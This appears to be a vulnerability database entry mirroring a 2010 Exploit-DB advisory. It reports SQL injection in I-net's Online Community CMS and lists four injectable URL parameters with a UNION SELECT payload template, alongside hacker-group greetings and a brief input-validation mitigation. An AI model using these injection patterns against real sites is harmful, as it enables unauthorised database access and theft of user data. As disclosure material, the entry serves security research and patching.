Online Community CMS by I-net SQL Injection Vulnerability

vendor:

Online Community CMS

by:

Th3 RDX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Community CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Projects Made By Them

2010

Online Community CMS by I-net SQL Injection Vulnerability

A SQL injection vulnerability exists in Online Community CMS by I-net, which allows an attacker to execute arbitrary SQL commands via the 'blid', 'plid', 'vdoid', and 'mid' parameters in view-blog-full.php, mem-play-song-cnt.php, mem_videos-play-cnt.php, and profile.php respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, type, and length.

Source

Exploit-DB raw data:

# Exploit Title: Online Community CMS by I-net SQL Injection Vulnerability
# Date: 16-03-2010
# Author: Th3 RDX
# Software Link: www.i-netsolution.com/online-community-php-scripts.html
# Version:
# Tested on: Projects Made By Them
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Team I.C.W | www.IndiShell.in | Andhra Hackers | www.exploit-db.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to all Indian Cyber Warriors ,IndiShell, Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Online Community CMS by I-net SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.i-netsolution.com/online-community-php-scripts.html

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code
{e.g = Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6 (tables & column) }

[SQLi] http://server/onlinecommunity/view-blog-full.php?blid=69[CODE]

[SQLi] http://server/onlinecommunitys/mem-play-song-cnt.php?plid=23[CODE]

[SQLi] http://server/onlinecommunity/mem_videos-play-cnt.php?vdoid=41[CODE]

[SQLi] http://server/onlinecommunity/profile.php?mid=72[CODE]


%\\
##############################################################################

##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 16 March 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=